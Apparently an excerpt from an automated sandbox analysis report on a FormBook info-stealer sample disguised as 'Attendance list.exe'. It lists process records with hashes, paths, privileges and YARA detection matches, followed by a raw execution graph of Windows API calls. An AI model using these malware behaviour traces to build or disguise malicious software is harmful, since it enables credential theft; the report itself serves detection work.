                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:01:14:49
                      Start date:02/07/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Attendance list.exe"
                      Imagebase:0x370000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:3
                      Start time:01:14:59
                      Start date:02/07/2024
                      Path:C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe"
                      Imagebase:0x120000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:4
                      Start time:01:15:01
                      Start date:02/07/2024
                      Path:C:\Windows\SysWOW64\clip.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\clip.exe"
                      Imagebase:0x300000
                      File size:24'576 bytes
                      MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:6
                      Start time:01:15:26
                      Start date:02/07/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff79f9e0000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:4%
                        Dynamic/Decrypted Code Coverage:0.4%
                        Signature Coverage:2.6%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:54
                        execution_graph 99028 8c107d 99033 8c71eb 99028->99033 99030 8c108c 99064 8e2f80 99030->99064 99034 8c71fb __ftell_nolock 99033->99034 99067 8c77c7 99034->99067 99038 8c72ba 99079 8e074f 99038->99079 99045 8c77c7 59 API calls 99046 8c72eb 99045->99046 99098 8c7eec 99046->99098 99048 8c72f4 RegOpenKeyExW 99049 8fecda RegQueryValueExW 99048->99049 99053 8c7316 Mailbox 99048->99053 99050 8fed6c RegCloseKey 99049->99050 99051 8fecf7 99049->99051 99050->99053 99063 8fed7e _wcscat Mailbox __wsetenvp 99050->99063 99102 8e0ff6 99051->99102 99053->99030 99054 8fed10 99112 8c538e 99054->99112 99057 8fed38 99115 8c7d2c 99057->99115 99058 8c7b52 59 API calls 99058->99063 99060 8fed52 99060->99050 99062 8c3f84 59 API calls 99062->99063 99063->99053 99063->99058 99063->99062 99124 8c7f41 99063->99124 99192 8e2e84 99064->99192 99066 8c1096 99068 8e0ff6 Mailbox 59 API calls 99067->99068 99069 8c77e8 99068->99069 99070 8e0ff6 Mailbox 59 API calls 99069->99070 99071 8c72b1 99070->99071 99072 8c4864 99071->99072 99128 8f1b90 99072->99128 99075 8c7f41 59 API calls 99076 8c4897 99075->99076 99130 8c48ae 99076->99130 99078 8c48a1 Mailbox 99078->99038 99080 8f1b90 __ftell_nolock 99079->99080 99081 8e075c GetFullPathNameW 99080->99081 99082 8e077e 99081->99082 99083 8c7d2c 59 API calls 99082->99083 99084 8c72c5 99083->99084 99085 8c7e0b 99084->99085 99086 8c7e1f 99085->99086 99087 8ff173 99085->99087 99152 8c7db0 99086->99152 99157 8c8189 99087->99157 99090 8c72d3 99092 8c3f84 99090->99092 99091 8ff17e __wsetenvp _memmove 99094 8c3f92 99092->99094 99097 8c3fb4 _memmove 99092->99097 99093 8e0ff6 Mailbox 59 API calls 99095 8c3fc8 99093->99095 99096 8e0ff6 Mailbox 59 API calls 99094->99096 99095->99045 99096->99097 99097->99093 99099 8c7f06 99098->99099 99101 8c7ef9 99098->99101 99100 8e0ff6 Mailbox 59 API calls 99099->99100 99100->99101 99101->99048 99104 8e0ffe 99102->99104 99105 8e1018 99104->99105 99107 8e101c std::exception::exception 99104->99107 99160 8e594c 99104->99160 99177 8e35e1 DecodePointer 99104->99177 99105->99054 99178 8e87db RaiseException 99107->99178 99109 8e1046 99179 8e8711 58 API calls _free 99109->99179 99111 8e1058 99111->99054 99113 8e0ff6 Mailbox 59 API calls 99112->99113 99114 8c53a0 RegQueryValueExW 99113->99114 99114->99057 99114->99060 99116 8c7d38 __wsetenvp 99115->99116 99117 8c7da5 99115->99117 99119 8c7d4e 99116->99119 99120 8c7d73 99116->99120 99118 8c7e8c 59 API calls 99117->99118 99123 8c7d56 _memmove 99118->99123 99188 8c8087 99119->99188 99121 8c8189 59 API calls 99120->99121 99121->99123 99123->99060 99125 8c7f50 __wsetenvp _memmove 99124->99125 99126 8e0ff6 Mailbox 59 API calls 99125->99126 99127 8c7f8e 99126->99127 99127->99063 99129 8c4871 GetModuleFileNameW 99128->99129 99129->99075 99131 8f1b90 __ftell_nolock 99130->99131 99132 8c48bb GetFullPathNameW 99131->99132 99133 8c48da 99132->99133 99134 8c48f7 99132->99134 99135 8c7d2c 59 API calls 99133->99135 99136 8c7eec 59 API calls 99134->99136 99137 8c48e6 99135->99137 99136->99137 99140 8c7886 99137->99140 99141 8c7894 99140->99141 99144 8c7e8c 99141->99144 99143 8c48f2 99143->99078 99145 8c7e9a 99144->99145 99147 8c7ea3 _memmove 99144->99147 99145->99147 99148 8c7faf 99145->99148 99147->99143 99149 8c7fc2 99148->99149 99151 8c7fbf _memmove 99148->99151 99150 8e0ff6 Mailbox 59 API calls 99149->99150 99150->99151 99151->99147 99153 8c7dbf __wsetenvp 99152->99153 99154 8c7dd0 _memmove 99153->99154 99155 8c8189 59 API calls 99153->99155 99154->99090 99156 8ff130 _memmove 99155->99156 99158 8e0ff6 Mailbox 59 API calls 99157->99158 99159 8c8193 99158->99159 99159->99091 99161 8e59c7 99160->99161 99170 8e5958 99160->99170 99186 8e35e1 DecodePointer 99161->99186 99163 8e59cd 99187 8e8d68 58 API calls __getptd_noexit 99163->99187 99166 8e598b RtlAllocateHeap 99167 8e59bf 99166->99167 99166->99170 99167->99104 99169 8e5963 99169->99170 99180 8ea3ab 58 API calls 2 library calls 99169->99180 99181 8ea408 58 API calls 8 library calls 99169->99181 99182 8e32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99169->99182 99170->99166 99170->99169 99171 8e59b3 99170->99171 99175 8e59b1 99170->99175 99183 8e35e1 DecodePointer 99170->99183 99184 8e8d68 58 API calls __getptd_noexit 99171->99184 99185 8e8d68 58 API calls __getptd_noexit 99175->99185 99177->99104 99178->99109 99179->99111 99180->99169 99181->99169 99183->99170 99184->99175 99185->99167 99186->99163 99187->99167 99189 8c809f 99188->99189 99191 8c8099 99188->99191 99190 8e0ff6 Mailbox 59 API calls 99189->99190 99190->99191 99191->99123 99193 8e2e90 __initptd 99192->99193 99200 8e3457 99193->99200 99199 8e2eb7 __initptd 99199->99066 99217 8e9e4b 99200->99217 99202 8e2e99 99203 8e2ec8 DecodePointer DecodePointer 99202->99203 99204 8e2ea5 99203->99204 99205 8e2ef5 99203->99205 99214 8e2ec2 99204->99214 99205->99204 99263 8e89e4 59 API calls 2 library calls 99205->99263 99207 8e2f58 EncodePointer EncodePointer 99207->99204 99208 8e2f07 99208->99207 99209 8e2f2c 99208->99209 99264 8e8aa4 61 API calls 2 library calls 99208->99264 99209->99204 99212 8e2f46 EncodePointer 99209->99212 99265 8e8aa4 61 API calls 2 library calls 99209->99265 99212->99207 99213 8e2f40 99213->99204 99213->99212 99266 8e3460 99214->99266 99218 8e9e6f EnterCriticalSection 99217->99218 99219 8e9e5c 99217->99219 99218->99202 99224 8e9ed3 99219->99224 99221 8e9e62 99221->99218 99248 8e32f5 58 API calls 3 library calls 99221->99248 99225 8e9edf __initptd 99224->99225 99226 8e9ee8 99225->99226 99227 8e9f00 99225->99227 99249 8ea3ab 58 API calls 2 library calls 99226->99249 99236 8e9f21 __initptd 99227->99236 99252 8e8a5d 58 API calls 2 library calls 99227->99252 99230 8e9eed 99250 8ea408 58 API calls 8 library calls 99230->99250 99231 8e9f15 99234 8e9f1c 99231->99234 99235 8e9f2b 99231->99235 99233 8e9ef4 99251 8e32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99233->99251 99253 8e8d68 58 API calls __getptd_noexit 99234->99253 99239 8e9e4b __lock 58 API calls 99235->99239 99236->99221 99241 8e9f32 99239->99241 99242 8e9f3f 99241->99242 99243 8e9f57 99241->99243 99254 8ea06b InitializeCriticalSectionAndSpinCount 99242->99254 99255 8e2f95 99243->99255 99246 8e9f4b 99261 8e9f73 LeaveCriticalSection _doexit 99246->99261 99249->99230 99250->99233 99252->99231 99253->99236 99254->99246 99256 8e2f9e RtlFreeHeap 99255->99256 99257 8e2fc7 __dosmaperr 99255->99257 99256->99257 99258 8e2fb3 99256->99258 99257->99246 99262 8e8d68 58 API calls __getptd_noexit 99258->99262 99260 8e2fb9 GetLastError 99260->99257 99261->99236 99262->99260 99263->99208 99264->99209 99265->99213 99269 8e9fb5 LeaveCriticalSection 99266->99269 99268 8e2ec7 99268->99199 99269->99268 99270 8c568a 99277 8c5c18 99270->99277 99275 8c56ba Mailbox 99278 8e0ff6 Mailbox 59 API calls 99277->99278 99279 8c5c2b 99278->99279 99280 8e0ff6 Mailbox 59 API calls 99279->99280 99281 8c569c 99280->99281 99282 8c5632 99281->99282 99289 8c5a2f 99282->99289 99284 8c5674 99284->99275 99288 8c81c1 61 API calls Mailbox 99284->99288 99286 8c5643 99286->99284 99296 8c5d20 99286->99296 99302 8c5bda 59 API calls 2 library calls 99286->99302 99288->99275 99290 8fe065 99289->99290 99291 8c5a40 99289->99291 99303 916443 59 API calls Mailbox 99290->99303 99291->99286 99293 8fe06f 99294 8e0ff6 Mailbox 59 API calls 99293->99294 99295 8fe07b 99294->99295 99297 8c5d93 99296->99297 99300 8c5d2e 99296->99300 99304 8c5dae SetFilePointerEx 99297->99304 99299 8c5d56 99299->99286 99300->99299 99301 8c5d66 ReadFile 99300->99301 99301->99299 99301->99300 99302->99286 99303->99293 99304->99300 99305 900226 99311 8cade2 Mailbox 99305->99311 99307 900c86 99470 9166f4 99307->99470 99309 900c8f 99311->99307 99311->99309 99312 9000e0 VariantClear 99311->99312 99313 8cb6c1 99311->99313 99321 92d2e6 99311->99321 99368 93e237 99311->99368 99371 8d2123 99311->99371 99411 8c5906 99311->99411 99420 93474d 99311->99420 99429 9423c9 99311->99429 99467 8c9df0 59 API calls Mailbox 99311->99467 99468 917405 59 API calls 99311->99468 99312->99311 99469 92a0b5 89 API calls 4 library calls 99313->99469 99322 92d310 99321->99322 99323 92d305 99321->99323 99327 8c77c7 59 API calls 99322->99327 99358 92d3ea Mailbox 99322->99358 99504 8c9c9c 59 API calls 99323->99504 99325 8e0ff6 Mailbox 59 API calls 99326 92d433 99325->99326 99328 92d43f 99326->99328 99331 8c5906 60 API calls 99326->99331 99329 92d334 99327->99329 99473 8c9997 99328->99473 99330 8c77c7 59 API calls 99329->99330 99332 92d33d 99330->99332 99331->99328 99335 8c9997 84 API calls 99332->99335 99337 92d349 99335->99337 99505 8c46f9 99337->99505 99340 92d46a GetLastError 99343 92d483 99340->99343 99341 92d49e 99345 92d500 99341->99345 99346 92d4c9 99341->99346 99342 92d35e 99556 8c7c8e 99342->99556 99349 92d3f3 Mailbox 99343->99349 99570 8c5a1a CloseHandle 99343->99570 99351 8e0ff6 Mailbox 59 API calls 99345->99351 99348 8e0ff6 Mailbox 59 API calls 99346->99348 99352 92d4ce 99348->99352 99349->99311 99350 92d3e3 99569 8c9c9c 59 API calls 99350->99569 99356 92d505 99351->99356 99357 92d4df 99352->99357 99360 8c77c7 59 API calls 99352->99360 99356->99349 99362 8c77c7 59 API calls 99356->99362 99571 92f835 59 API calls 2 library calls 99357->99571 99358->99325 99358->99349 99360->99357 99361 92d3a5 99364 8c7f41 59 API calls 99361->99364 99362->99349 99365 92d3b2 99364->99365 99568 923c66 63 API calls Mailbox 99365->99568 99367 92d3bb Mailbox 99367->99350 99656 93cdf1 99368->99656 99370 93e247 99370->99311 99767 8c9bf8 99371->99767 99374 8e0ff6 Mailbox 59 API calls 99376 8d2154 99374->99376 99377 8d2164 99376->99377 99380 8c5906 60 API calls 99376->99380 99381 8c9997 84 API calls 99377->99381 99378 8d2189 99386 8d2196 99378->99386 99799 8c9c9c 59 API calls 99378->99799 99379 9069af 99379->99378 99798 92f7df 59 API calls 99379->99798 99380->99377 99383 8d2172 99381->99383 99385 8c5956 67 API calls 99383->99385 99384 9069f7 99384->99386 99387 9069ff 99384->99387 99388 8d2181 99385->99388 99390 8c5e3f 2 API calls 99386->99390 99800 8c9c9c 59 API calls 99387->99800 99388->99378 99388->99379 99797 8c5a1a CloseHandle 99388->99797 99392 8d219d 99390->99392 99393 906a11 99392->99393 99394 8d21b7 99392->99394 99396 8e0ff6 Mailbox 59 API calls 99393->99396 99395 8c77c7 59 API calls 99394->99395 99397 8d21bf 99395->99397 99398 906a17 99396->99398 99780 8c56d2 99397->99780 99400 906a2b 99398->99400 99801 8c59b0 ReadFile SetFilePointerEx 99398->99801 99405 906a2f _memmove 99400->99405 99802 92794e 59 API calls 2 library calls 99400->99802 99402 8d21ce 99402->99405 99795 8c9b9c 59 API calls Mailbox 99402->99795 99405->99405 99406 8d21e2 Mailbox 99407 8d221c 99406->99407 99408 8c5dcf CloseHandle 99406->99408 99407->99311 99409 8d2210 99408->99409 99409->99407 99796 8c5a1a CloseHandle 99409->99796 99412 8e0ff6 Mailbox 59 API calls 99411->99412 99413 8c5916 99412->99413 99414 8c5dcf CloseHandle 99413->99414 99415 8c5921 99414->99415 99416 8c77c7 59 API calls 99415->99416 99417 8c5929 99416->99417 99418 8c5dcf CloseHandle 99417->99418 99419 8c5930 99418->99419 99419->99311 99421 8c9997 84 API calls 99420->99421 99422 934787 99421->99422 99806 8c63a0 99422->99806 99424 934797 99425 9347bc 99424->99425 99831 8ca000 99424->99831 99427 8c9bf8 59 API calls 99425->99427 99428 9347c0 99425->99428 99427->99428 99428->99311 99430 8c77c7 59 API calls 99429->99430 99431 9423e0 99430->99431 99432 8c9997 84 API calls 99431->99432 99433 9423ef 99432->99433 99434 8c7b76 59 API calls 99433->99434 99435 942402 99434->99435 99436 8c9997 84 API calls 99435->99436 99437 94240f 99436->99437 99438 94249d 99437->99438 99439 942429 99437->99439 99440 8c9997 84 API calls 99438->99440 99898 8c9c9c 59 API calls 99439->99898 99442 9424a2 99440->99442 99444 9424b0 99442->99444 99445 9424ce 99442->99445 99443 94242e 99446 94248c 99443->99446 99448 942445 99443->99448 99447 8c9bf8 59 API calls 99444->99447 99449 9424e3 99445->99449 99899 8c9c9c 59 API calls 99445->99899 99450 8c9bf8 59 API calls 99446->99450 99464 942499 Mailbox 99447->99464 99451 8c79ab 59 API calls 99448->99451 99453 9424f8 99449->99453 99900 8c9c9c 59 API calls 99449->99900 99450->99464 99455 942452 99451->99455 99454 8c80d7 59 API calls 99453->99454 99457 942512 99454->99457 99458 8c7c8e 59 API calls 99455->99458 99879 91f8f2 99457->99879 99460 942460 99458->99460 99461 8c79ab 59 API calls 99460->99461 99462 942479 99461->99462 99463 8c7c8e 59 API calls 99462->99463 99466 942487 99463->99466 99464->99311 99901 8c9b9c 59 API calls Mailbox 99466->99901 99467->99311 99468->99311 99469->99307 99902 916636 99470->99902 99472 916702 99472->99309 99474 8c99ab 99473->99474 99475 8c99b1 99473->99475 99491 8c5956 99474->99491 99476 8ff9fc __i64tow 99475->99476 99477 8c99f9 99475->99477 99479 8c99b7 __itow 99475->99479 99482 8ff903 99475->99482 99572 8e38d8 83 API calls 4 library calls 99477->99572 99481 8e0ff6 Mailbox 59 API calls 99479->99481 99483 8c99d1 99481->99483 99484 8e0ff6 Mailbox 59 API calls 99482->99484 99489 8ff97b Mailbox _wcscpy 99482->99489 99483->99474 99485 8c7f41 59 API calls 99483->99485 99487 8ff948 99484->99487 99485->99474 99486 8e0ff6 Mailbox 59 API calls 99488 8ff96e 99486->99488 99487->99486 99488->99489 99490 8c7f41 59 API calls 99488->99490 99573 8e38d8 83 API calls 4 library calls 99489->99573 99490->99489 99574 8c5dcf 99491->99574 99495 8c5981 99499 8c59a4 99495->99499 99586 8c5770 99495->99586 99497 8c5993 99603 8c53db SetFilePointerEx SetFilePointerEx 99497->99603 99499->99340 99499->99341 99500 8c599a 99500->99499 99501 8fe030 99500->99501 99604 923696 SetFilePointerEx SetFilePointerEx WriteFile 99501->99604 99503 8fe060 99503->99499 99504->99322 99506 8c77c7 59 API calls 99505->99506 99507 8c470f 99506->99507 99508 8c77c7 59 API calls 99507->99508 99509 8c4717 99508->99509 99510 8c77c7 59 API calls 99509->99510 99511 8c471f 99510->99511 99512 8c77c7 59 API calls 99511->99512 99513 8c4727 99512->99513 99514 8fd8fb 99513->99514 99515 8c475b 99513->99515 99516 8c81a7 59 API calls 99514->99516 99517 8c79ab 59 API calls 99515->99517 99518 8fd904 99516->99518 99519 8c4769 99517->99519 99520 8c7eec 59 API calls 99518->99520 99521 8c7e8c 59 API calls 99519->99521 99523 8c479e 99520->99523 99522 8c4773 99521->99522 99522->99523 99524 8c79ab 59 API calls 99522->99524 99526 8c47bd 99523->99526 99540 8fd924 99523->99540 99542 8c47de 99523->99542 99527 8c4794 99524->99527 99633 8c7b52 99526->99633 99530 8c7e8c 59 API calls 99527->99530 99528 8c47ef 99532 8c4801 99528->99532 99636 8c81a7 99528->99636 99529 8fd9f4 99533 8c7d2c 59 API calls 99529->99533 99530->99523 99536 8c4811 99532->99536 99538 8c81a7 59 API calls 99532->99538 99551 8fd9b1 99533->99551 99541 8c4818 99536->99541 99543 8c81a7 59 API calls 99536->99543 99537 8c79ab 59 API calls 99537->99542 99538->99536 99539 8fd9dd 99539->99529 99546 8fd9c8 99539->99546 99540->99529 99540->99539 99550 8fd95b 99540->99550 99544 8c81a7 59 API calls 99541->99544 99553 8c481f Mailbox 99541->99553 99620 8c79ab 99542->99620 99543->99541 99544->99553 99545 8c7b52 59 API calls 99545->99551 99548 8c7d2c 59 API calls 99546->99548 99547 8fd9b9 99549 8c7d2c 59 API calls 99547->99549 99548->99551 99549->99551 99550->99547 99554 8fd9a4 99550->99554 99551->99542 99551->99545 99640 8c7a84 59 API calls 2 library calls 99551->99640 99553->99342 99555 8c7d2c 59 API calls 99554->99555 99555->99551 99557 8ff094 99556->99557 99558 8c7ca0 99556->99558 99651 918123 59 API calls _memmove 99557->99651 99645 8c7bb1 99558->99645 99561 8c7cac 99561->99350 99565 923e73 99561->99565 99562 8ff09e 99563 8c81a7 59 API calls 99562->99563 99564 8ff0a6 Mailbox 99563->99564 99652 924696 GetFileAttributesW 99565->99652 99568->99367 99569->99358 99570->99349 99571->99349 99572->99479 99573->99476 99575 8c5de8 99574->99575 99576 8c5962 99574->99576 99575->99576 99577 8c5ded CloseHandle 99575->99577 99578 8c5df9 99576->99578 99577->99576 99579 8fe181 99578->99579 99580 8c5e12 CreateFileW 99578->99580 99581 8c5e34 99579->99581 99582 8fe187 CreateFileW 99579->99582 99580->99581 99581->99495 99582->99581 99583 8fe1ad 99582->99583 99605 8c5c4e 99583->99605 99587 8fdfce 99586->99587 99588 8c578b 99586->99588 99602 8c581a 99587->99602 99615 8c5e3f 99587->99615 99589 8c5c4e 2 API calls 99588->99589 99588->99602 99590 8c57ad 99589->99590 99591 8c538e 59 API calls 99590->99591 99593 8c57b7 99591->99593 99593->99587 99594 8c57c4 99593->99594 99595 8e0ff6 Mailbox 59 API calls 99594->99595 99596 8c57cf 99595->99596 99597 8c538e 59 API calls 99596->99597 99598 8c57da 99597->99598 99599 8c5d20 2 API calls 99598->99599 99600 8c5807 99599->99600 99601 8c5c4e 2 API calls 99600->99601 99601->99602 99602->99497 99603->99500 99604->99503 99612 8c5c68 99605->99612 99606 8c5cef SetFilePointerEx 99613 8c5dae SetFilePointerEx 99606->99613 99607 8fe151 99614 8c5dae SetFilePointerEx 99607->99614 99610 8c5cc3 99610->99581 99611 8fe16b 99612->99606 99612->99607 99612->99610 99613->99610 99614->99611 99616 8c5c4e 2 API calls 99615->99616 99617 8c5e60 99616->99617 99618 8c5c4e 2 API calls 99617->99618 99619 8c5e74 99618->99619 99619->99602 99621 8c79ba 99620->99621 99622 8c7a17 99620->99622 99621->99622 99623 8c79c5 99621->99623 99624 8c7e8c 59 API calls 99622->99624 99626 8c79e0 99623->99626 99627 8fef32 99623->99627 99625 8c79e8 _memmove 99624->99625 99625->99528 99629 8c8087 59 API calls 99626->99629 99628 8c8189 59 API calls 99627->99628 99630 8fef3c 99628->99630 99629->99625 99631 8e0ff6 Mailbox 59 API calls 99630->99631 99632 8fef5c 99631->99632 99634 8c7faf 59 API calls 99633->99634 99635 8c47c7 99634->99635 99635->99537 99635->99542 99637 8c81ba 99636->99637 99638 8c81b2 99636->99638 99637->99532 99641 8c80d7 99638->99641 99640->99551 99642 8c80fa _memmove 99641->99642 99643 8c80e7 99641->99643 99642->99637 99643->99642 99644 8e0ff6 Mailbox 59 API calls 99643->99644 99644->99642 99646 8c7bbf 99645->99646 99650 8c7be5 _memmove 99645->99650 99647 8e0ff6 Mailbox 59 API calls 99646->99647 99646->99650 99648 8c7c34 99647->99648 99649 8e0ff6 Mailbox 59 API calls 99648->99649 99649->99650 99650->99561 99651->99562 99653 923e7a 99652->99653 99654 9246b1 FindFirstFileW 99652->99654 99653->99350 99653->99361 99654->99653 99655 9246c6 FindClose 99654->99655 99655->99653 99657 8c9997 84 API calls 99656->99657 99658 93ce2e 99657->99658 99661 93ce75 Mailbox 99658->99661 99694 93dab9 99658->99694 99660 93d242 99744 93dbdc 92 API calls Mailbox 99660->99744 99661->99370 99664 93cec6 Mailbox 99664->99661 99667 8c9997 84 API calls 99664->99667 99680 93d0cd 99664->99680 99726 92f835 59 API calls 2 library calls 99664->99726 99727 93d2f3 61 API calls 2 library calls 99664->99727 99665 93d251 99666 93d0db 99665->99666 99668 93d25d 99665->99668 99707 93cc82 99666->99707 99667->99664 99668->99661 99673 93d114 99722 8e0e48 99673->99722 99676 93d147 99729 8c942e 99676->99729 99677 93d12e 99728 92a0b5 89 API calls 4 library calls 99677->99728 99680->99660 99680->99666 99682 93d139 GetCurrentProcess TerminateProcess 99682->99676 99686 93d2b8 99686->99661 99690 93d2cc FreeLibrary 99686->99690 99687 93d17f 99741 93d95d 107 API calls _free 99687->99741 99690->99661 99692 93d190 99692->99686 99742 8c8ea0 59 API calls Mailbox 99692->99742 99743 8c9e9c 60 API calls Mailbox 99692->99743 99745 93d95d 107 API calls _free 99692->99745 99695 8c7faf 59 API calls 99694->99695 99696 93dad4 CharLowerBuffW 99695->99696 99746 91f658 99696->99746 99700 8c77c7 59 API calls 99701 93db0d 99700->99701 99702 8c79ab 59 API calls 99701->99702 99703 93db24 99702->99703 99704 8c7e8c 59 API calls 99703->99704 99705 93db30 Mailbox 99704->99705 99706 93db6c Mailbox 99705->99706 99753 93d2f3 61 API calls 2 library calls 99705->99753 99706->99664 99708 93cc9d 99707->99708 99712 93ccf2 99707->99712 99709 8e0ff6 Mailbox 59 API calls 99708->99709 99711 93ccbf 99709->99711 99710 8e0ff6 Mailbox 59 API calls 99710->99711 99711->99710 99711->99712 99713 93dd64 99712->99713 99714 93df8d Mailbox 99713->99714 99715 93dd87 _strcat _wcscpy __wsetenvp 99713->99715 99714->99673 99715->99714 99716 8c9c9c 59 API calls 99715->99716 99717 8c9cf8 59 API calls 99715->99717 99718 8c9d46 59 API calls 99715->99718 99719 8c9997 84 API calls 99715->99719 99720 8e594c 58 API calls __crtCompareStringA_stat 99715->99720 99756 925b29 61 API calls 2 library calls 99715->99756 99716->99715 99717->99715 99718->99715 99719->99715 99720->99715 99723 8e0e5d 99722->99723 99724 8e0ef5 VirtualAlloc 99723->99724 99725 8e0ec3 99723->99725 99724->99725 99725->99676 99725->99677 99726->99664 99727->99664 99728->99682 99730 8c9436 99729->99730 99731 8e0ff6 Mailbox 59 API calls 99730->99731 99732 8c9444 99731->99732 99733 8c9450 99732->99733 99757 8c935c 59 API calls Mailbox 99732->99757 99735 8c91b0 99733->99735 99758 8c92c0 99735->99758 99737 8e0ff6 Mailbox 59 API calls 99738 8c925b 99737->99738 99738->99692 99740 8c8ea0 59 API calls Mailbox 99738->99740 99739 8c91bf 99739->99737 99739->99738 99740->99687 99741->99692 99742->99692 99743->99692 99744->99665 99745->99692 99748 91f683 __wsetenvp 99746->99748 99747 91f6c2 99747->99700 99747->99705 99748->99747 99749 91f769 99748->99749 99752 91f6b8 99748->99752 99749->99747 99755 8c7a24 61 API calls 99749->99755 99752->99747 99754 8c7a24 61 API calls 99752->99754 99753->99706 99754->99752 99755->99749 99756->99715 99757->99733 99759 8c92c9 Mailbox 99758->99759 99760 8ff5c8 99759->99760 99765 8c92d3 99759->99765 99761 8e0ff6 Mailbox 59 API calls 99760->99761 99763 8ff5d4 99761->99763 99762 8c92da 99762->99739 99763->99763 99765->99762 99766 8c9df0 59 API calls Mailbox 99765->99766 99766->99765 99768 8ffbff 99767->99768 99769 8c9c08 99767->99769 99770 8ffc10 99768->99770 99772 8c7d2c 59 API calls 99768->99772 99774 8e0ff6 Mailbox 59 API calls 99769->99774 99771 8c7eec 59 API calls 99770->99771 99773 8ffc1a 99771->99773 99772->99770 99777 8c9c34 99773->99777 99778 8c77c7 59 API calls 99773->99778 99775 8c9c1b 99774->99775 99775->99773 99776 8c9c26 99775->99776 99776->99777 99779 8c7f41 59 API calls 99776->99779 99777->99374 99777->99379 99778->99777 99779->99777 99781 8c56dd 99780->99781 99782 8c5702 99780->99782 99781->99782 99786 8c56ec 99781->99786 99783 8c7eec 59 API calls 99782->99783 99784 92349a 99783->99784 99788 9234c9 99784->99788 99803 923436 ReadFile SetFilePointerEx 99784->99803 99804 8c7a84 59 API calls 2 library calls 99784->99804 99787 8c5c18 59 API calls 99786->99787 99789 9235ba 99787->99789 99788->99402 99791 8c5632 61 API calls 99789->99791 99792 9235c8 99791->99792 99794 9235d8 Mailbox 99792->99794 99805 8c793a 61 API calls Mailbox 99792->99805 99794->99402 99795->99406 99796->99407 99797->99379 99798->99379 99799->99384 99800->99392 99801->99400 99802->99405 99803->99784 99804->99784 99805->99794 99854 8c7b76 99806->99854 99808 8c65ca 99861 8c766f 99808->99861 99810 8c65e4 Mailbox 99810->99424 99813 8c7eec 59 API calls 99827 8c63c5 99813->99827 99814 8fe41f 99871 91fdba 91 API calls 4 library calls 99814->99871 99815 8c766f 59 API calls 99815->99827 99819 8fe42d 99820 8c766f 59 API calls 99819->99820 99821 